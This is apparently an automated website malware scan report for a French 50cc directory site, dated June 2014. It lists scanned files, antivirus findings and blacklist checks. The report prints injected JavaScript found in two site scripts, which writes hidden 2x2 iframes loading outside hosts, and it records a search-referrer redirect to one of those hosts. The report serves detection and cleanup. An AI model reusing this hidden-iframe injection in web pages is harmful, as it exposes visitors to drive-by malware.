Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.annuaire-50cc.fr/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.annuaire-50cc.fr Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Jun 2014 00:56:08 GMT Location: http://kozijnen.com/czof.html?h=464688 Server: Apache Vary: Accept-Encoding Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 720planBAK=R3744884295; path=/; expires=Wed, 25-Jun-2014 01:59:11 GMT Set-Cookie: 720plan=R3438257783; path=/; expires=Wed, 25-Jun-2014 02:04:39 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.annuaire-50cc.fr/ | 200 OK Content-Length: 10398 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/javascript/config | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/test404page.js | 404 Not Found Content-Length: 4625 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/nouveautes.html | 200 OK Content-Length: 24433 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/javascript/jquery/jquery.js | 200 OK Content-Length: 77745 Content-Type: application/javascript | clean |
http://www.annuaire-50cc.fr/javascript/jquery/jquery.searchEnginePanel.js | 200 OK Content-Length: 2446 Content-Type: application/javascript | clean |
http://www.annuaire-50cc.fr/javascript/main/loadSearchEngine.js | 200 OK Content-Length: 222 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=464688></iframe>');
jQuery(document).ready(function(){ $.searchEnginePanel(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=464688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=464688> | ||
http://www.annuaire-50cc.fr/javascript/site/visitSite.js | 200 OK Content-Length: 535 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=464688></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ohcd.html?j=464688></iframe>'); function visitSite(siteId){ $.ajax({ type: 'POST', data: { 'siteId': siteId }, url: AppRouter.getRewrittedUrl('/site/visit'), async: false }); return true; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://snmsc.org/ohcd.html?j=464688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ohcd.html?j=464688> Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=464688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=464688> | ||
http://www.annuaire-50cc.fr/top-hits.html | 200 OK Content-Length: 25274 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/top-notes.html | 200 OK Content-Length: 5842 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/top-rank.html | 200 OK Content-Length: 28171 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/top-referrers.html | 200 OK Content-Length: 5802 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/allcategories.html | 200 OK Content-Length: 7209 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/webmaster-submit-website.html | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 25 Jun 2014 00:56:12 GMT Pragma: no-cache Location: /webmaster-submit-website-free.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: 720planBAK=R3744884295; path=/; expires=Wed, 25-Jun-2014 02:17:41 GMT Set-Cookie: 720plan=R3438257783; path=/; expires=Wed, 25-Jun-2014 01:59:11 GMT Set-Cookie: PHPSESSID=e49dc52b52cd3b8667fb3481356e1644; path=/ X-Powered-By: PHP/5.2.17 | clean |
http://www.annuaire-50cc.fr/webmaster-submit-website-free.html | 200 OK Content-Length: 13131 Content-Type: text/html | clean |
http://www.annuaire-50cc.fr/javascript/jquery/jquery.livequery.js | 200 OK Content-Length: 2602 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=annuaire-50cc.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://annuaire-50cc.fr/
Result: annuaire-50cc.fr is not infected or malware details are not published yet.
Result: annuaire-50cc.fr is not infected or malware details are not published yet.